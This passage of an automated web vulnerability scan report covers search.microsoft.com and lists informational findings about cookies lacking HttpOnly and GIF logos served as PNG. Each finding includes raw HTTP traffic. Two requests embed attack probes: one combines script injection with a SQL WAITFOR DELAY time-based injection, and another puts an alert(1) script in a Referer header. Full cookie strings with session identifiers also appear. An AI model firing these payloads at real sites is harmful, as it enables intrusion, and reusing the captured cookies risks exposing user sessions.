Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: /Help.aspx?mkt=en-US
Date: Sun, 09 Oct 2011 01:35:23 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/


3.4. http://search.microsoft.com/Preference.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Preference.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Preference.aspx HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: /Preference.aspx?mkt=en-US
Date: Sun, 09 Oct 2011 01:35:23 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/


3.5. http://search.microsoft.com/Results_error.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /Results_error.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Results_error.aspx?%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005DA)%3C/script%3E=%27;WAITFOR%20DELAY%20%270:0:25%27--&mkt=en-US HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search.microsoft.com
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318113000839:ss=1318112890953; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 02:34:57&Microsoft.VisitStartDate=10/09/2011 02:34:57&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=15&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; MUID=0914779C379B646A20E07519349B641D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Vary: Accept-Encoding
Content-Length: 39756
Date: Sun, 09 Oct 2011 12:26:38 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/
Cache-Control: no-cache

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en">
...[SNIP]...

3.6. http://search.microsoft.com/WorldWide.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /WorldWide.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WorldWide.aspx HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: /WorldWide.aspx?mkt=en-US
Date: Sun, 09 Oct 2011 01:35:24 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/


3.7. http://search.microsoft.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx?q=xss%20sqli%20httpi%20xmli%20meta:Search.MSForums.ForumID(690a399e-fac3-4345-8063-d9ac7ffced47)%20site:microsoft.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://social.microsoft.com/Forums/en-US/mas/thread/177e0051-5cf6-4148-ae71-d5033b9be61c
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: search.microsoft.com
Accept-Encoding: gzip, deflate
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318096803423:ss=1318096803423; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 00:38:45&Microsoft.VisitStartDate=10/09/2011 00:38:45&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=4&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; SS_TRACK=SS_IA=0&SS_Refn=&SS_Terms=xss+sqli+httpi+xmli&SS_LastTerm=&SS_LastRefn=
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: /results.aspx?q=xss%20sqli%20httpi%20xmli%20meta:Search.MSForums.ForumID(690a399e-fac3-4345-8063-d9ac7ffced47)%20site:microsoft.com&mkt=en-US
Date: Sun, 09 Oct 2011 01:27:48 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/


3.8. http://search.microsoft.com/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.microsoft.com
Path:   /search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.aspx HTTP/1.1
Host: search.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: /search.aspx?mkt=en-US
Date: Sun, 09 Oct 2011 01:35:22 GMT
Connection: close
Set-Cookie: mkt1=norm=en-US; path=/
Set-Cookie: mkt2=ui=en-US; path=/


4. Content type incorrectly stated  previous
There are 5 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


4.1. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_cs-CZ.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://search.microsoft.com
Path:   /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_cs-CZ.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_cs-CZ.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: search.microsoft.com
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318113000839:ss=1318112890953; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; MS0=91453865f9884b96958f4e24923e165a; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 01:47:41&Microsoft.VisitStartDate=10/09/2011 01:27:59&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=11&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=53b18a7b-c983-4418-a802-ac76d02f3d41&Microsoft.CreationDate=10/09/2011 01:27:59&Microsoft.LastVisitDate=10/09/2011 01:47:41&Microsoft.NumberOfVisits=7&SessionCookie.Id=A33A1214000B897DB51DB843B5D0EFDC; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; MUID=0914779C379B646A20E07519349B641D

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 18:23:58 GMT
Accept-Ranges: bytes
ETag: "451443d5221cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Content-Length: 2667
Date: Sun, 09 Oct 2011 01:47:42 GMT
Connection: close

.PNG
.
...IHDR...(... ......#......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

4.2. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_da-DK.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://search.microsoft.com
Path:   /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_da-DK.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_da-DK.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: search.microsoft.com
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318113000839:ss=1318112890953; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; MS0=75216d30a0da4403b08d7e7cad3e2956; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 01:47:41&Microsoft.VisitStartDate=10/09/2011 01:27:59&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=12&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=53b18a7b-c983-4418-a802-ac76d02f3d41&Microsoft.CreationDate=10/09/2011 01:27:59&Microsoft.LastVisitDate=10/09/2011 01:47:41&Microsoft.NumberOfVisits=8&SessionCookie.Id=A33A1214000B897DB51DB843B5D0EFDC; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; MUID=0914779C379B646A20E07519349B641D

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 18:23:59 GMT
Accept-Ranges: bytes
ETag: "15d8f63d5221cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Content-Length: 2665
Date: Sun, 09 Oct 2011 01:47:43 GMT
Connection: close

.PNG
.
...IHDR...(... ......#......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

4.3. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-AU.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://search.microsoft.com
Path:   /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-AU.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-AU.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: search.microsoft.com
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318113000839:ss=1318112890953; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; MS0=774ef3158ba541d68129f3745c4f1314; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 01:29:50&Microsoft.VisitStartDate=10/09/2011 01:27:59&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=10&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=53b18a7b-c983-4418-a802-ac76d02f3d41&Microsoft.CreationDate=10/09/2011 01:27:59&Microsoft.LastVisitDate=10/09/2011 01:29:50&Microsoft.NumberOfVisits=6&SessionCookie.Id=A33A1214000B897DB51DB843B5D0EFDC; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; MUID=0914779C379B646A20E07519349B641D

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 18:24:10 GMT
Accept-Ranges: bytes
ETag: "55db55445221cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Content-Length: 2665
Date: Sun, 09 Oct 2011 01:47:41 GMT
Connection: close

.PNG
.
...IHDR...(... ......#......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

4.4. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-CA.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://search.microsoft.com
Path:   /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-CA.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-CA.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: search.microsoft.com
Cookie: WT_FPC=id=295beb90f465350baae1317572472562:lv=1318113000839:ss=1318112890953; omniID=1317583309457_b2b9_155e_a35e_6220df2ab84f; MC1=GUID=20313fe81aaa2f48bd216cefc5ca9385&HASH=e83f&LV=201110&V=3&LU=1317583319514; A=I&I=AxUFAAAAAAC7BwAAYnL5tOtMT3+w/UKgs/F9TA!!&GO=244&CS=127g`\00022010002g20100; MS0=91453865f9884b96958f4e24923e165a; WT_NVR_RU=0=msdn:1=:2=; MSID=Microsoft.CreationDate=10/07/2011 21:40:29&Microsoft.LastVisitDate=10/09/2011 01:47:41&Microsoft.VisitStartDate=10/09/2011 01:27:59&Microsoft.CookieId=a85cff55-6bf8-4b3b-b914-c905c8d67337&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=11&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0371-5227-8141-4085; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=53b18a7b-c983-4418-a802-ac76d02f3d41&Microsoft.CreationDate=10/09/2011 01:27:59&Microsoft.LastVisitDate=10/09/2011 01:47:41&Microsoft.NumberOfVisits=7&SessionCookie.Id=A33A1214000B897DB51DB843B5D0EFDC; msdn=L=1033; Microsoft.com=SS_Url=&SS=1&SS_Refn_Incr=0; MUID=0914779C379B646A20E07519349B641D

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 18:24:11 GMT
Accept-Ranges: bytes
ETag: "b54f6455221cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Content-Length: 2665
Date: Sun, 09 Oct 2011 01:47:42 GMT
Connection: close

.PNG
.
...IHDR...(... ......#......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

4.5. http://search.microsoft.com/global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-US.gif  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://search.microsoft.com
Path:   /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-US.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /global/search/PublishingImages/SearchLogo/MicrosoftSearchLogo_en-US.gif HTTP/1.1
Host: search.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://search.microsoft.com/Help.aspx?36cee%22%3E%3Cscript%3Ealert(1)%3C/script%3E827bde607d6=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; TOptOut=1; s_vnum=1318713544174%26vn%3D1; _wt.user-311121=0badcf013d880d616981c0bf1e54d9ac136f144c5acd22105cc42edede26e941cdcc42d640bfc48b431d633c5361725eb223fbe510197060ac762f1f1296d07e0c2cf0ae9d5492a1786fdf4f92c67cd331802ff617c98e9c1701fde4435bd8c95c650090d4c1; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d00ec4618; _wt.control-314949-ta_Home_0=ee035a14c2ab20bbda1dbd5eec9136a6d03dd41c1b9139a386fb8f418634c51357690231f0e6a2f9314d1d90d60d7aaf22057ed29185d7f7d593c7a37ef0d9e4dc6536c90aed1627e824bf7800a9495a; _wt.user-314949=ee034b14deb021f7946fef1cb6873eb2c120c2514adb609095cbae54c97e8b014b6d031cc4e9bdef7d105dd1925a6cad380279c78a9696b08ac5f4a370e6c2af82657f8358a94177f93bbf705b69d2fcd9137a21285d70680d75ed3a19e197349cef318d3f25057c660e; _wt.control-314949-ta_TemplatesHP=ee035800cba710eb815ce54ae4d176e5973dd41a0b8c2480d6aed8029036df530a2a5c76e0a1fdaf025a0191cf4b62b7735e2a97c3d0c0f9dbc5d6a26bfad6af82653fdf0ce2162af93bbf71406c93ad92436029335b7c670679ed2b5d022a8308; op_referrerType=microsoft; op390globalmonitorus2011gum=a0tg1sq2k2279nt02721a13df; op390products2011gum=a0qe1gk204279nt02a21618bd; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; op_siteTorb=3; op_refUrl=http%3A//office.microsoft.com/en-us/; op390productpage1gum=a0py1es1xg279nt026246bdaa; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1317395931646%7D%2C%22lastinvited%22%3A1317395931646%2C%22userid%22%3A%2213173959316465716226303484291%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; __unam=289c965-13298260906-1a63ba0b-2; ixpLightBrowser=0; UserState=Returning=True&LastVisit=10/03/2011 17:04:37&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%2fwindowslive%3fquery%3dxss+sqli%26rq%3dmeta%3aSearch.MSForums.ForumID(56d695f0-3dc6-445e-983e-2ad049cb01e3)%2bsite%3amicrosoft.com%26rn%3dWindows%2bLive%2bID%3a%2bDevelopment%2bForum%7e%7e10%2f03%2f2011+17%3a06%3a41&SS=283&SS_Refn_Incr=3; s_nr=1317662058320-Repeat; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\GL002jC:10R02h11@03; mcI=Fri, 14 Oct 2011 19:02:28 GMT; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; msdn=L=1033; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1318005567068:ss=1318005138801; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=10/07/2011 19:39:17&Microsoft.VisitStartDate=10/07/2011 19:32:11&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=149&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; mkt1=norm=en-US; mkt2=ui=en-US

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 18:24:22 GMT
Accept-Ranges: bytes
ETag: "b1f5434b5221cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P1: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Content-Length: 2665
Date: Sun, 09 Oct 2011 01:38:25 GMT
Connection: close

.PNG
.
...IHDR...(... ......#......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

Report generated by XSS.CX at Sun Oct 09 07:44:42 CDT 2011.